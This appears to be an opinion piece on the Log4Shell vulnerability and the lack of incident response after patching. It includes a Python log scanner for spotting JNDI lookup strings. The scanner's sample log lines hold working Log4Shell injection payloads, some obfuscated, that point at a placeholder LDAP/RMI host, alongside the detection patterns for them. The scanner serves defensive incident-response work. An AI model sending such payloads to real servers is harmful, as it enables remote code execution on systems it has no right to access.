Log4Shell is a dumpster fire that should have been avoided


On Thursday, December 9, 2021, my young, Minecraft-addicted kids were still completely oblivious of the Log4j vulnerabilities in their favorite game. Then again, so was every cybersecurity professional in the world.

Log4Shell should have been avoided

That all changed when the Apache Log4j project announced CVE-2021-44228 (aka Log4Shell), a zero-day vulnerability in Log4j, the standard Java logging library used by apps all over the world, from Microsoft’s Minecraft to Twitter to Tesla to Apple’s iCloud. This led to a blaze of stories about how the internet is “on fire.”

These screaming headlines make sense to those of us in the software and digital services industry. This vulnerability, which continues to be followed by others, is bad news, and it’s hard to find a metaphor to describe an easily exploitable zero-day vulnerability in a huge number of high-value targets.

Rationally, nearly every business, organization, and government that does anything related to software went into crisis mode. It is difficult to imagine anyone having been unaffected, and many are probably still on high alert even after nearly two weeks.

However, for most internet users, life went on as usual.

If they have read about the Log4Shell firestorm, average users have probably concluded this story was all smoke and no fire: Minecraft works, Facebook works, their iPhone is charged. Who cares? Amazon’s services in the US have been a bit on and off lately, but these were unrelated outages.

Fortunately, my kids, like most people, likely have no idea how bad this could get—at least not yet. But if you work in cybersecurity, you know one thing is true: most of us have lucked out, so far.

We could have avoided Log4Shell

The truth is we have no idea how severely attackers have taken advantage of the vulnerabilities in Log4j. Attackers can obfuscate their intrusions relatively easily, and it’s unlikely that the hundreds of thousands of companies that have been busy patching their systems have engaged in any sort of incident response to detect whether the vulnerability was exploited before the update.
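The minimal incident-response step the paragraph above describes is to go back through the logs that were written before the patch and look for the lookup string that triggers CVE-2021-44228. The scanner below is an added example, not code from the article or from the Log4j project; the access-log lines it scans are constructed, `lookup-host.example` is a placeholder, and the `lower`/`upper`/default-value unwrapping covers the common nesting tricks that hide the `${jndi:` marker from a plain string match.

```python
import re

# Log4j lookup forms that are routinely nested around the JNDI marker so that a
# naive search for "${jndi:" misses it. Each one resolves to plain text, so
# repeatedly reducing them reveals the underlying string for inspection.
LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${x:-y} and ${::-y} both yield y
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample access-log lines (not from any real incident). Lines 2-4
# carry a lookup string in the User-Agent field; line 5 has an innocuous "${user}".
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://lookup-host.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:17:13 +0000] "GET /api/${user} HTTP/1.1" 404 12 "-" "curl/7.79"',
]


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Reduce nested lower/upper/default lookups until the text stops changing."""
    for _ in range(max_passes):
        new = LOWER.sub(lambda m: m.group(1).lower(), text)
        new = UPPER.sub(lambda m: m.group(1).upper(), new)
        new = DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return one finding per line whose normalized form contains a JNDI lookup."""
    findings = []
    for idx, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = JNDI.search(normalized)
        if match:
            findings.append({
                "line": idx,
                "indicator": normalized[match.start():match.start() + 60],
                "obfuscated": normalized != line,  # nesting had to be unwrapped to see it
            })
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG_LINES):
        tag = "obfuscated" if f["obfuscated"] else "plain"
        print(f"line {f['line']}: {tag}: {f['indicator']}")
```

A hit only shows that a lookup string reached a log call; whether the lookup was actually resolved is a separate question that outbound DNS and connection logs from the same time window have to answer. Running this over the pre-patch retention window, not just the last few days, is the point of the exercise.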

Without a doubt, this is a dumpster fire. And mostly everyone in our industry is doing their best to make sure…
